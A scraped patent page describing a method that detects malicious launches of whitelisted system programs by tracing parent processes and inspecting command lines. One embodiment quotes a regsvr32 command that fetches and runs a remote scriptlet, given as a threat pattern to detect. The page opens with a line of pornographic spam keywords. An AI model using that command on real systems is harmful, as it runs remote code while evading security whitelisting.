白丝美女被狂躁免费视频网站,500av导航大全精品,yw.193.cnc爆乳尤物未满,97se亚洲综合色区,аⅴ天堂中文在线网官网

首頁 / 專利庫 / 電腦零配件 / 固件 / 軟件 / 系統(tǒng)軟件 / 操作系統(tǒng) / 進(jìn)程 / 父進(jìn)程 / 一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)

一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)

閱讀:113發(fā)布:2020-05-11

專利匯可以提供一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)專利檢索,專利查詢,專利分析的服務(wù)。并且本 申請 公開了一種惡意內(nèi)容檢測方法:在每個白名單程序啟動之前,根據(jù)要求系統(tǒng)啟動該白名單程序的啟動信息中包含的內(nèi)容,判定該白名單程序是否由惡意內(nèi)容控制啟動,從而追溯到該白名單程序的啟動的源頭,而試圖通過白名單程序執(zhí)行惡意操作的惡意內(nèi)容,將通過對源頭的追溯被找到自身與白名單程序之間的關(guān)系,進(jìn)而及時阻止惡意行為的執(zhí)行。區(qū)別于現(xiàn)有的文件內(nèi)容檢測機(jī)制,本方案不僅檢測運(yùn)算量更小且效果更好;相比于內(nèi)存 進(jìn)程 檢測機(jī)制,則能夠?qū)⒆R別結(jié)果提前至惡意行為執(zhí)行之前,最大程度的降低了惡意內(nèi)容或惡意行為對系統(tǒng)造成的危害。本申請還同時公開了一種惡意內(nèi)容檢測裝置、 電子 設(shè)備及可讀存儲介質(zhì),具有上述有益效果。,下面是一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)專利的具體信息內(nèi)容。

1.一種惡意內(nèi)容檢測方法,其特征在于,包括:
獲取啟動的白名單程序的啟動信息;
根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動;
若根據(jù)所述啟動信息判斷所述白名單程序由惡意內(nèi)容控制啟動,則終止所述白名單程序的啟動操作。
2.根據(jù)權(quán)利要求1所述的惡意內(nèi)容檢測方法,其特征在于,獲取啟動的白名單程序的啟動信息,包括:
獲取啟動的白名單程序的所有父進(jìn)程
對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
判斷所述父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件;
若所述父進(jìn)程文件為惡意文件,則判定所述白名單程序由惡意內(nèi)容控制啟動;
若所述父進(jìn)程文件不是惡意文件,則判定所述白名單程序由正常內(nèi)容控制啟動。
3.根據(jù)權(quán)利要求2所述的惡意內(nèi)容檢測方法,其特征在于,當(dāng)所述父進(jìn)程文件為惡意文件時,還包括:
判斷所述父進(jìn)程文件是否還能夠控制其它白名單程序啟動;
若所述父進(jìn)程文件還能夠控制其它白名單程序啟動,則為所述其它白名單程序附加不允許啟動的標(biāo)記,以使啟動所述其它白名單程序時根據(jù)所述標(biāo)記直接終止啟動操作。
4.根據(jù)權(quán)利要求1所述的惡意內(nèi)容檢測方法,其特征在于,獲取啟動的白名單程序的啟動信息,包括:
獲取啟動的白名單程序的命令行;
對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
判斷所述命令行中是否包含有網(wǎng)絡(luò)特征;
若所述命令行中包含有網(wǎng)絡(luò)特征,則判斷所述網(wǎng)絡(luò)特征是否具有威脅;若所述網(wǎng)絡(luò)特征具有威脅,則判定所述白名單程序由惡意內(nèi)容控制啟動;
若所述命令行中不包含有網(wǎng)絡(luò)特征或所述網(wǎng)絡(luò)特征不具有威脅,則判定所述白名單程序由正常內(nèi)容控制啟動。
5.根據(jù)權(quán)利要求1所述的惡意內(nèi)容檢測方法,其特征在于,獲取啟動的白名單程序的啟動信息,包括:
獲取啟動的白名單程序的命令行;
對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
判斷所述命令行中是否包含有文件路徑;
若所述命令行中包含有文件路徑,則判斷所述文件路徑指向的文件是否為惡意文件;
若所述文件路徑指向的文件為惡意文件,則判定所述白名單程序由惡意內(nèi)容控制啟動;
若所述命令行中不包含有文件路徑或所述文件路徑指向的文件不是惡意文件,則判定所述白名單程序由正常內(nèi)容控制啟動。
6.根據(jù)權(quán)利要求1至5任一項(xiàng)所述的惡意內(nèi)容檢測方法,其特征在于,當(dāng)根據(jù)所述啟動信息無法判斷出所述白名單程序由惡意內(nèi)容控制啟動時,還包括:
監(jiān)測得到所述白名單程序啟動后的實(shí)際行為特征;
比較所述實(shí)際行為特征和預(yù)設(shè)行為特征,以根據(jù)比較結(jié)果確定所述白名單是否由惡意內(nèi)容控制啟動。
7.根據(jù)權(quán)利要求6所述的惡意內(nèi)容檢測方法,其特征在于,在終止所述白名單程序的啟動操作之后,還包括:
通過預(yù)設(shè)路徑上報包含被終止啟動操作的白名單程序的惡意內(nèi)容入侵提示。
8.一種惡意內(nèi)容檢測裝置,其特征在于,包括:
啟動信息獲取單元,用于獲取啟動的白名單程序的啟動信息;
惡意啟動判斷單元,用于根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動;
終止啟動單元,用于當(dāng)根據(jù)所述啟動信息判斷所述白名單程序由惡意內(nèi)容控制啟動時,終止所述白名單程序的啟動操作。
9.一種電子設(shè)備,其特征在于,包括:
存儲器,用于存儲計算機(jī)程序;
處理器,用于在執(zhí)行所述計算機(jī)程序時實(shí)現(xiàn)如權(quán)利要求1至7任一項(xiàng)所述的惡意內(nèi)容檢測方法的各步驟。
10.一種可讀存儲介質(zhì),其特征在于,所述可讀存儲介質(zhì)上存儲有計算機(jī)程序,所述計算機(jī)程序在被處理器執(zhí)行時實(shí)現(xiàn)如權(quán)利要求1至7任一項(xiàng)所述的惡意內(nèi)容檢測方法的各步驟。

說明書全文

一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)

技術(shù)領(lǐng)域

[0001] 本申請涉及網(wǎng)絡(luò)安全技術(shù)領(lǐng)域,特別涉及一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì)。

背景技術(shù)

[0002] 攻擊者在滲透或開發(fā)惡意軟件的過程中,常常會利用各種技術(shù)和手段來躲避現(xiàn)今多種的惡意內(nèi)容檢測機(jī)制,從而成功入侵至目標(biāo)環(huán)境。
[0003] 現(xiàn)今發(fā)現(xiàn)存在一種通過系統(tǒng)內(nèi)置的程序白名單中的白名單程序來執(zhí)行惡意操作的躲避方式。由于白名單程序上多為系統(tǒng)運(yùn)行所需的底層程序,將其列入程序白名單的目的是:避免對經(jīng)常啟動的安全程序進(jìn)行檢查,規(guī)避無效檢查,從而提升系統(tǒng)運(yùn)行效率。
[0004] 在對存在惡意內(nèi)容或執(zhí)行了惡意操作的系統(tǒng)進(jìn)行追溯時,發(fā)現(xiàn)源頭為白名單程序,而現(xiàn)今檢測白名單程序是否被當(dāng)作惡意內(nèi)容入侵的工具,是通過對白名單程序進(jìn)行文件檢測或內(nèi)存進(jìn)程檢測來實(shí)現(xiàn)的。其中,文件檢測方式是檢測對白名單程序的文件是否包含惡意內(nèi)容,但經(jīng)研究發(fā)現(xiàn),即使白名單程序在惡意內(nèi)容的控制下啟動、執(zhí)行惡意操作,其白名單程序的文件本身往往并被遭到篡改,且此種方式只能檢測文件以及文件對應(yīng)的進(jìn)程,若文件重新啟動系統(tǒng)進(jìn)程以執(zhí)行惡意操作,可能會檢測不到,即檢測效果不好;內(nèi)存進(jìn)程檢測的檢測原理是對內(nèi)存中的進(jìn)程進(jìn)行掃描、搜索、規(guī)則匹配等操作,相較基于文件的檢測方式能夠得到較好的檢測效果,但能夠檢測到惡意內(nèi)容的結(jié)果卻是建立在惡意內(nèi)容或惡意行為已經(jīng)被執(zhí)行的基礎(chǔ)上。
[0005] 因此,如何克服上述現(xiàn)有技術(shù)存在的各項(xiàng)技術(shù)缺陷,提供一種更優(yōu)的惡意內(nèi)容檢測機(jī)制,是本領(lǐng)域技術(shù)人員亟待解決的問題。發(fā)明內(nèi)容
[0006] 本申請的目的是提供一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì),旨在將受惡意內(nèi)容控制啟動的白名單程序在真正啟動之前識別出來,最大程度的降低惡意內(nèi)容對系統(tǒng)造成的危害。
[0007] 為實(shí)現(xiàn)上述目的,本申請?zhí)峁┝艘环N惡意內(nèi)容檢測方法,包括:
[0008] 獲取啟動的白名單程序的啟動信息;
[0009] 根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動;
[0010] 若根據(jù)所述啟動信息判斷所述白名單程序由惡意內(nèi)容控制啟動,則終止所述白名單程序的啟動操作。
[0011] 可選的,獲取啟動的白名單程序的啟動信息,包括:
[0012] 獲取啟動的白名單程序的所有父進(jìn)程;
[0013] 對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
[0014] 判斷所述父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件;
[0015] 若所述父進(jìn)程文件為惡意文件,則判定所述白名單程序由惡意內(nèi)容控制啟動;
[0016] 若所述父進(jìn)程文件不是惡意文件,則判定所述白名單程序由正常內(nèi)容控制啟動。
[0017] 可選的,當(dāng)所述父進(jìn)程文件為惡意文件時,還包括:
[0018] 判斷所述父進(jìn)程文件是否還能夠控制其它白名單程序啟動;
[0019] 若所述父進(jìn)程文件還能夠控制其它白名單程序啟動,則為所述其它白名單程序附加不允許啟動的標(biāo)記,以使啟動所述其它白名單程序時根據(jù)所述標(biāo)記直接終止啟動操作。
[0020] 可選的,獲取啟動的白名單程序的啟動信息,包括:
[0021] 獲取啟動的白名單程序的命令行;
[0022] 對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
[0023] 判斷所述命令行中是否包含有網(wǎng)絡(luò)特征;
[0024] 若所述命令行中包含有網(wǎng)絡(luò)特征,則判斷所述網(wǎng)絡(luò)特征是否具有威脅;若所述網(wǎng)絡(luò)特征具有威脅,則判定所述白名單程序由惡意內(nèi)容控制啟動;
[0025] 若所述命令行中不包含有網(wǎng)絡(luò)特征或所述網(wǎng)絡(luò)特征不具有威脅,則判定所述白名單程序由正常內(nèi)容控制啟動。
[0026] 可選的,獲取啟動的白名單程序的啟動信息,包括:
[0027] 獲取啟動的白名單程序的命令行;
[0028] 對應(yīng)的,根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動,包括:
[0029] 判斷所述命令行中是否包含有文件路徑;
[0030] 若所述命令行中包含有文件路徑,則判斷所述文件路徑指向的文件是否為惡意文件;若所述文件路徑指向的文件為惡意文件,則判定所述白名單程序由惡意內(nèi)容控制啟動;
[0031] 若所述命令行中不包含有文件路徑或所述文件路徑指向的文件不是惡意文件,則判定所述白名單程序由正常內(nèi)容控制啟動。
[0032] 可選的,當(dāng)根據(jù)所述啟動信息無法判斷出所述白名單程序由惡意內(nèi)容控制啟動時,還包括:
[0033] 監(jiān)測得到所述白名單程序啟動后的實(shí)際行為特征;
[0034] 比較所述實(shí)際行為特征和預(yù)設(shè)行為特征,以根據(jù)比較結(jié)果確定所述白名單是否由惡意內(nèi)容控制啟動。
[0035] 可選的,在終止所述白名單程序的啟動操作之后,還包括:
[0036] 通過預(yù)設(shè)路徑上報包含被終止啟動操作的白名單程序的惡意內(nèi)容入侵提示。
[0037] 為實(shí)現(xiàn)上述目的,本申請還提供了一種惡意內(nèi)容檢測裝置,包括:
[0038] 啟動信息獲取單元,用于獲取啟動的白名單程序的啟動信息;
[0039] 惡意啟動判斷單元,用于根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動;
[0040] 終止啟動單元,用于當(dāng)根據(jù)所述啟動信息判斷所述白名單程序由惡意內(nèi)容控制啟動時,終止所述白名單程序的啟動操作。
[0041] 可選的,所述啟動信息獲取單元包括:
[0042] 父進(jìn)程獲取子單元,用于獲取啟動的白名單程序的所有父進(jìn)程;
[0043] 對應(yīng)的,所述惡意啟動判斷單元包括:
[0044] 父進(jìn)程文件判斷子單元,用于判斷所述父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件;
[0045] 第一惡意啟動判定子單元,用于當(dāng)所述父進(jìn)程文件為惡意文件時,判定所述白名單程序由惡意內(nèi)容控制啟動;
[0046] 第二非惡意啟動判定子單元,用于當(dāng)所述父進(jìn)程文件不是惡意文件時,判定所述白名單程序由正常內(nèi)容控制啟動。
[0047] 可選的,該惡意內(nèi)容檢測裝置還包括:
[0048] 其它白名單程序存在判斷單元,用于當(dāng)所述父進(jìn)程文件為惡意文件時,判斷所述父進(jìn)程文件是否還能夠控制其它白名單程序啟動;
[0049] 標(biāo)記附加單元,用于當(dāng)所述父進(jìn)程文件還能夠控制其它白名單程序啟動時,為所述其它白名單程序附加不允許啟動的標(biāo)記,以使啟動所述其它白名單程序時直接根據(jù)所述標(biāo)記終止啟動操作。
[0050] 可選的,所述啟動信息獲取單元包括:
[0051] 第一命令行獲取子單元,用于獲取啟動的白名單程序的命令行;
[0052] 對應(yīng)的,所述惡意啟動判斷單元包括:
[0053] 網(wǎng)絡(luò)特征包含判斷子單元,用于判斷所述命令行中是否包含有網(wǎng)絡(luò)特征;
[0054] 網(wǎng)絡(luò)特征威脅判斷子單元,用于當(dāng)所述命令行中包含有網(wǎng)絡(luò)特征時,判斷所述網(wǎng)絡(luò)特征是否具有威脅;
[0055] 第二惡意啟動判定子單元,用于當(dāng)所述網(wǎng)絡(luò)特征具有威脅時,判定所述白名單程序由惡意內(nèi)容控制啟動;
[0056] 第二非惡意啟動判定子單元,用于當(dāng)所述命令行中不包含有網(wǎng)絡(luò)特征或所述網(wǎng)絡(luò)特征不具有威脅時,判定所述白名單程序由正常內(nèi)容控制啟動。
[0057] 可選的,所述啟動信息獲取單元包括:
[0058] 第二命令行獲取子單元,用于獲取啟動的白名單程序的命令行;
[0059] 對應(yīng)的,所述惡意啟動判斷單元包括:
[0060] 文件路徑包含判斷子單元,用于判斷所述命令行中是否包含有文件路徑;
[0061] 路徑指向文件性質(zhì)判斷子單元,用于當(dāng)所述命令行中包含有文件路徑時,判斷所述文件路徑指向的文件是否為惡意文件;
[0062] 第三惡意啟動判定子單元,用于當(dāng)所述文件路徑指向的文件為惡意文件時,判定所述白名單程序由惡意內(nèi)容控制啟動;
[0063] 第三非惡意啟動判定子單元,用于當(dāng)所述命令行中不包含有文件路徑或所述文件路徑指向的文件不是惡意文件時,判定所述白名單程序由正常內(nèi)容控制啟動。
[0064] 可選的,該惡意內(nèi)容檢測裝置還包括:
[0065] 實(shí)際行為特征獲取單元,用于當(dāng)根據(jù)所述啟動信息無法判斷出所述白名單程序由惡意內(nèi)容控制啟動時,監(jiān)測得到所述白名單程序啟動后的實(shí)際行為特征;
[0066] 行為特征比對單元,用于比較所述實(shí)際行為特征和預(yù)設(shè)行為特征,以根據(jù)比較結(jié)果確定所述白名單是否由惡意內(nèi)容控制啟動。
[0067] 可選的,該惡意內(nèi)容檢測方法還包括:
[0068] 惡意內(nèi)容入侵提示單元,用于在終止所述白名單程序的啟動操作之后,通過預(yù)設(shè)路徑上報包含被終止啟動操作的白名單程序的惡意內(nèi)容入侵提示。
[0069] 為實(shí)現(xiàn)上述目的,本申請還提供了一種電子設(shè)備,包括:
[0070] 存儲器,用于存儲計算機(jī)程序
[0071] 處理器,用于執(zhí)行所述計算機(jī)程序時實(shí)現(xiàn)如上述內(nèi)容所描述的惡意內(nèi)容檢測方法的各步驟。
[0072] 為實(shí)現(xiàn)上述目的,本申請還提供了一種可讀存儲介質(zhì),所述可讀存儲介質(zhì)上存儲有計算機(jī)程序,所述計算機(jī)程序被處理器執(zhí)行時實(shí)現(xiàn)如上述內(nèi)容所描述的惡意內(nèi)容檢測方法的各步驟。
[0073] 本申請?zhí)峁┝艘环N惡意內(nèi)容檢測方法,包括:獲取啟動的白名單程序的啟動信息;根據(jù)所述啟動信息判斷所述白名單程序是否由惡意內(nèi)容控制啟動;若根據(jù)所述啟動信息判斷所述白名單程序由惡意內(nèi)容控制啟動,則終止所述白名單程序的啟動操作。
[0074] 根據(jù)本申請?zhí)峁┑膼阂鈨?nèi)容檢測方法可以看出,本申請在每個白名單程序啟動之前,根據(jù)要求系統(tǒng)啟動該白名單程序的啟動信息中包含的內(nèi)容,判定該白名單程序是否由惡意內(nèi)容控制啟動,從而追溯到該白名單程序的啟動的源頭,而試圖通過白名單程序執(zhí)行惡意操作的惡意內(nèi)容,將通過對源頭的追溯被找到自身與白名單程序之間的關(guān)系,進(jìn)而及時阻止惡意行為的執(zhí)行。區(qū)別于現(xiàn)有技術(shù)所使用的文件內(nèi)容檢測機(jī)制,本申請方案不僅檢測運(yùn)算量更小且效果更好,而相比于內(nèi)存進(jìn)程檢測機(jī)制,則能夠?qū)⒆R別結(jié)果提前至惡意行為執(zhí)行之前,最大程度的降低了惡意內(nèi)容或惡意行為對系統(tǒng)造成的危害。
[0075] 本申請同時還提供了一種惡意內(nèi)容檢測裝置、電子設(shè)備及可讀存儲介質(zhì),具有上述有益效果,在此不再贅述。附圖說明
[0076] 為了更清楚地說明本申請實(shí)施例或現(xiàn)有技術(shù)中的技術(shù)方案,下面將對實(shí)施例或現(xiàn)有技術(shù)描述中所需要使用的附圖作簡單地介紹,顯而易見地,下面描述中的附圖僅僅是本申請的實(shí)施例,對于本領(lǐng)域普通技術(shù)人員來講,在不付出創(chuàng)造性勞動的前提下,還可以根據(jù)提供的附圖獲得其他的附圖。
[0077] 圖1為本申請實(shí)施例提供的一種惡意內(nèi)容檢測方法的流程圖;
[0078] 圖2為本申請實(shí)施例提供的另一種惡意內(nèi)容檢測方法的流程圖;
[0079] 圖3為本申請實(shí)施例提供的又一種惡意內(nèi)容檢測方法的流程圖;
[0080] 圖4為本申請實(shí)施例提供的再一種惡意內(nèi)容檢測方法的流程圖;
[0081] 圖5為本申請實(shí)施例提供的一種加入后置檢測機(jī)制的惡意內(nèi)容檢測方法的流程圖;
[0082] 圖6為本申請實(shí)施例提供的另一種加入后置檢測機(jī)制的惡意內(nèi)容檢測方法的流程圖;
[0083] 圖7為本申請實(shí)施例提供的一種優(yōu)選的惡意內(nèi)容檢測方法的流程圖;
[0084] 圖8為本申請實(shí)施例提供的一種惡意內(nèi)容檢測裝置的結(jié)構(gòu)框圖。

具體實(shí)施方式

[0085] 本申請的目的是提供一種惡意內(nèi)容檢測方法、裝置、電子設(shè)備及可讀存儲介質(zhì),旨在將受惡意內(nèi)容控制啟動的白名單程序在真正啟動之前識別出來,最大程度的降低惡意內(nèi)容對系統(tǒng)造成的危害。
[0086] 為使本申請實(shí)施例的目的、技術(shù)方案和優(yōu)點(diǎn)更加清楚,下面將結(jié)合本申請實(shí)施例中的附圖,對本申請實(shí)施例中的技術(shù)方案進(jìn)行清楚、完整地描述,顯然,所描述的實(shí)施例是本申請一部分實(shí)施例,而不是全部的實(shí)施例。基于本申請中的實(shí)施例,本領(lǐng)域普通技術(shù)人員在沒有做出創(chuàng)造性勞動前提下所獲得的所有其它實(shí)施例,都屬于本申請保護(hù)的范圍。
[0087] 實(shí)施例一
[0088] 請參見圖1,圖1為本申請實(shí)施例提供的一種惡意內(nèi)容檢測方法的流程圖,其包括以下步驟:
[0089] S101:獲取啟動的白名單程序的啟動信息;
[0090] 本步驟旨在獲取到將要啟動的白名單程序的啟動信息。其中,該白名單程序?yàn)楸涣腥雴影酌麊沃械某绦?,大多為系統(tǒng)底層程序,用于實(shí)現(xiàn)系統(tǒng)各功能的正常運(yùn)行。為加深理解,此處還通過下表1給出了WIN7操作系統(tǒng)下的常被利用的白名單程序(該白名單程序包括程序名稱及不同操作系統(tǒng)環(huán)境下的絕對路徑,之所以示出絕對路徑,是因?yàn)楦鶕?jù)操作系統(tǒng)版本的不同,相同名稱的程序會具有不同的程序絕對路徑):
[0091] 表1
[0092]
[0093]
[0094] 其中,該啟動信息中包含了描述該白名單程序的啟動原因的相關(guān)信息,例如該白名單程序可以是在某一個父進(jìn)程的控制下啟動的,也可以是根據(jù)命令行中的某條命令的執(zhí)行從而啟動的,以及任何可以符合上述要求的方式,此處并不做具體限定。
[0095] 具體的,該啟動信息可以包含在向處理器或控制器發(fā)送的啟動請求中,即處理器或控制器的正常的工作流程為:接收到啟動請求,啟動該啟動請求指向的白名單程序,而在本方案中,為了判斷啟動請求指向的白名單程序是否是由惡意內(nèi)容控制啟動的,在接收到啟動請求之后、啟動該啟動請求指向的白名單程序之前,進(jìn)行本步驟的獲取啟動信息的步驟,以便后續(xù)步驟根據(jù)該啟動信息中包含的該白名單程序啟動原因的內(nèi)容得出判斷結(jié)果。
[0096] S102:根據(jù)啟動信息判斷白名單程序是否由惡意內(nèi)容控制啟動;
[0097] 在S101的基礎(chǔ)上,本步驟旨在根據(jù)啟動信息判斷出將要啟動的白名單程序是否是在惡意內(nèi)容的控制下啟動的。應(yīng)當(dāng)理解的是,惡意內(nèi)容控制白名單程序啟動必然意味著其要讓白名單程序執(zhí)行惡意行為來實(shí)現(xiàn)其目的。
[0098] 因此,本步驟根據(jù)啟動信息判斷該白名單程序是否由惡意內(nèi)容控制啟動的方式即為試圖根據(jù)啟動信息向上追溯到生成該啟動請求的程序或應(yīng)用,并通過對上層程序或應(yīng)用是否包含惡意內(nèi)容的判斷來判斷該白名單程序的本次啟動是否為正常啟動。
[0099] S103:終止白名單程序的啟動操作;
[0100] 本步驟建立在S102的判斷結(jié)果為根據(jù)啟動信息判斷出該白名單程序是由惡意內(nèi)容控制啟動的基礎(chǔ)上,說明該白名單程序的本次啟動為非正常啟動,屬于惡意內(nèi)容試圖通過系統(tǒng)不檢測的白名單程序來繞過安全檢測的方式,因此為了避免該白名單程序在啟動后,在惡意內(nèi)容的控制下執(zhí)行惡意行為對運(yùn)行環(huán)境造成危害,本步驟將立即終止該白名單程序的啟動操作。
[0101] 進(jìn)一步的,在終止白名單程序的啟動操作之后,還可以通過預(yù)設(shè)路徑上報包含被終止啟動操作的白名單程序的惡意內(nèi)容入侵提示,以及時進(jìn)行針對性修復(fù)和清除,保證運(yùn)行環(huán)境的安全。具體的,該預(yù)設(shè)路徑可以表現(xiàn)為短信、郵件、各式即時通訊應(yīng)用以及界面彈窗和聲光報警器等等。
[0102] S104:不做處理。
[0103] 本步驟建立在S102的判斷結(jié)果為根據(jù)啟動信息判斷出該白名單程序不是由惡意內(nèi)容控制啟動的基礎(chǔ)上,說明該白名單程序的本次啟動為正常啟動,因此本步驟將以不做任何處理的方式繼續(xù)執(zhí)行該白名單程序的啟動操作。
[0104] 基于本實(shí)施例上述內(nèi)容對方案的闡述可見,本申請在每個白名單程序啟動之前,根據(jù)要求系統(tǒng)啟動該白名單程序的啟動信息中包含的內(nèi)容,判定該白名單程序是否由惡意內(nèi)容控制啟動,從而追溯到該白名單程序的啟動的源頭,而試圖通過白名單程序執(zhí)行惡意操作的惡意內(nèi)容,將通過對源頭的追溯被找到自身與白名單程序之間的關(guān)系,進(jìn)而及時阻止惡意行為的執(zhí)行。區(qū)別于現(xiàn)有技術(shù)所使用的文件內(nèi)容檢測機(jī)制,本申請方案不僅檢測運(yùn)算量更小、耗時更短,且效果更好,而相比于內(nèi)存進(jìn)程檢測機(jī)制,則能夠?qū)⒆R別結(jié)果提前至惡意行為執(zhí)行之前,最大程度的降低了惡意內(nèi)容或惡意行為對系統(tǒng)造成的危害。
[0105] 實(shí)施例二
[0106] 在實(shí)施例一的基礎(chǔ)上,針對啟動信息具體為該白名單程序的父進(jìn)程的情況,本實(shí)施例通過圖2提供了另一種惡意內(nèi)容檢測方法,包括以下步驟:
[0107] S201:獲取啟動的白名單程序的所有父進(jìn)程;
[0108] 父進(jìn)程為實(shí)際控制了白名單程序啟動的上層進(jìn)程。以現(xiàn)今智能手機(jī)為例,在用戶通過智能手機(jī)使用微信APP時,可以通過直接點(diǎn)擊淘寶鏈接的方式跳轉(zhuǎn)至淘寶APP,在進(jìn)程層面,微信APP就是控制淘寶APP啟動(假定淘寶APP之前未啟動)的父進(jìn)程。
[0109] S202:判斷父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件,若是,執(zhí)行S203,否則執(zhí)行S204;
[0110] 在S201的基礎(chǔ)上,本步驟旨在判斷父進(jìn)程對應(yīng)的父進(jìn)程文件是否為惡意文件的方式,來判別該白名單程序是否由惡意內(nèi)容控制啟動。
[0111] 其中,判斷一個文件是否為惡意文件可以通過多種方式,例如基于一些特定的字符串特征、行為特征,以及一些公開的惡意文件特征庫來進(jìn)行判別,此處并不做具體限定,可根據(jù)實(shí)際情況選擇最合適實(shí)際應(yīng)用場景的方式。
[0112] S203:終止白名單程序的啟動操作;
[0113] 本步驟建立在S202的判斷結(jié)果為父進(jìn)程對應(yīng)的父進(jìn)程文件為惡意文件的基礎(chǔ)上,由于父進(jìn)程文件為惡意文件,那么有理由認(rèn)為惡意文件作為父進(jìn)程控制白名單程序啟動的目的是讓其執(zhí)行惡意行為,從而規(guī)避安全檢測,因此將立即終止該白名單程序的啟動操作,防止惡意行為的執(zhí)行。
[0114] S204:不做處理。
[0115] 本步驟建立在S202的判斷結(jié)果為父進(jìn)程對應(yīng)的父進(jìn)程文件為非惡意文件的基礎(chǔ)上,說明父進(jìn)程是由一個正常文件創(chuàng)建的,因此正常的父進(jìn)程控制啟動的白名單程序行為也應(yīng)被認(rèn)為時正常行為,因此以不做處理的方式使得該白名單程序正常啟動。
[0116] 需要說明的是,如果該白名單程序存在多級父進(jìn)程,則需要對每級父進(jìn)程都進(jìn)行檢測,即查找其對應(yīng)的文件,對文件進(jìn)行威脅檢測(即是否為惡意文件的檢測)。
[0117] 在實(shí)施例一的基礎(chǔ)上,本步驟以父進(jìn)程這一具體的啟動信息為例,給出了一種具體的實(shí)現(xiàn)方案。
[0118] 進(jìn)一步的,在父進(jìn)程文件為惡意文件的基礎(chǔ)上,考慮到還可能存在該父進(jìn)程文件創(chuàng)建的父進(jìn)程還可能擁有控制其它白名單程序啟動的能,還可以在確定該父進(jìn)程文件還能夠控制其它白名單程序啟動時,為其還能夠控制啟動的其它白名單程序附加不允許啟動的標(biāo)記,以使處理器后續(xù)接收到這些其它白名單程序的啟動請求時,可以直接根據(jù)其上附加的標(biāo)記直接終止啟動操作,減少不必要的判斷操作。當(dāng)然,在追溯到父進(jìn)程文件為惡意文件時,還應(yīng)及時清除該惡意文件,以避免后續(xù)危害。同時,還可以利用該父進(jìn)程文件作為新的惡意文件識別樣本,提升安全檢測機(jī)制對同類惡意文件的識別能力。
[0119] 實(shí)施例三
[0120] 在實(shí)施例一的基礎(chǔ)上,針對啟動信息具體為實(shí)現(xiàn)該白名單程序的啟動的命令行內(nèi)容的情況,本實(shí)施例通過圖3提供了又一種惡意內(nèi)容檢測方法,包括以下步驟:
[0121] S301:獲取啟動的白名單程序的命令行;
[0122] 命令行是多條命令的集合,可以理解為指令或命令集,或者理解為一串有意義的字符串。
[0123] S302:判斷命令行中是否包含有網(wǎng)絡(luò)特征,若是,執(zhí)行S303,否則執(zhí)行S305;
[0124] 本步驟中描述的網(wǎng)絡(luò)特征包括URL(Uniform?Resource?Locator,統(tǒng)一資源定位符)、DNS(Domain?Name?System,域名服務(wù)協(xié)議)、IP(Internet?Protocol,網(wǎng)際互連協(xié)議)地址中的至少一項(xiàng),以及任何可能指代惡意內(nèi)容的網(wǎng)絡(luò)參數(shù)。其中,URL可以是網(wǎng)絡(luò)上某個惡意內(nèi)容的資源定位符,其它則類似。
[0125] 具體的,命令行中的網(wǎng)絡(luò)特征可以通過正則匹配或類似的方式得到。
[0126] S303:判斷網(wǎng)絡(luò)特征是否具有威脅,若是,執(zhí)行S304,否則執(zhí)行S305;
[0127] 在S302的基礎(chǔ)上,本步驟旨在判斷該網(wǎng)絡(luò)特征是否為具有威脅的網(wǎng)絡(luò)特征,即其是否指向惡意內(nèi)容。
[0128] 例如,一種具體指向具有威脅的網(wǎng)絡(luò)特征為:
[0129] regsvr32/s/n/u/i:http://127.0.0.1:8080/test.txt?scrobj.dll。
[0130] S304:終止白名單程序的啟動操作;
[0131] 本步驟建立在S303的判斷結(jié)果為網(wǎng)絡(luò)特征具有威脅的基礎(chǔ)上,說明該白名單程序是在惡意內(nèi)容的生成的命令行的控制下啟動的,因此將立即終止該白名單程序的啟動操作。
[0132] S305:不做處理。
[0133] 本步驟建立在S303的判斷結(jié)果為網(wǎng)絡(luò)特征不具有威脅的基礎(chǔ)上,說明該白名單程序是在正常內(nèi)容的生成的命令行的控制下啟動的,因此將以不做處理的方式讓啟動操作繼續(xù)執(zhí)行。
[0134] 在實(shí)施例一的基礎(chǔ)上,本步驟以命令行這一具體的啟動信息為例,給出了一種具體的實(shí)現(xiàn)方案。是區(qū)別于實(shí)施例二給出的基于父進(jìn)程的另一種并列的實(shí)現(xiàn)方式,因此實(shí)際情況下父進(jìn)程和命令行都不一定存在。
[0135] 實(shí)施例四
[0136] 在實(shí)施例一的基礎(chǔ)上,針對啟動信息具體為實(shí)現(xiàn)該白名單程序的啟動的命令行內(nèi)容的情況,本實(shí)施例通過圖4又提供了一種區(qū)別于實(shí)施例三的惡意內(nèi)容檢測方法,包括以下步驟:
[0137] S401:獲取啟動的白名單程序的命令行;
[0138] S402:判斷命令行中是否包含有文件路徑,若是,執(zhí)行S403,否則執(zhí)行S405;
[0139] 具體的,命令行中的文件路徑可以通過正則匹配或類似的方式得到。
[0140] S403:判斷文件路徑指向的文件是否為惡意文件,若是,執(zhí)行S404,否則執(zhí)行S405;
[0141] S404:終止白名單程序的啟動操作;
[0142] S405:不做處理。
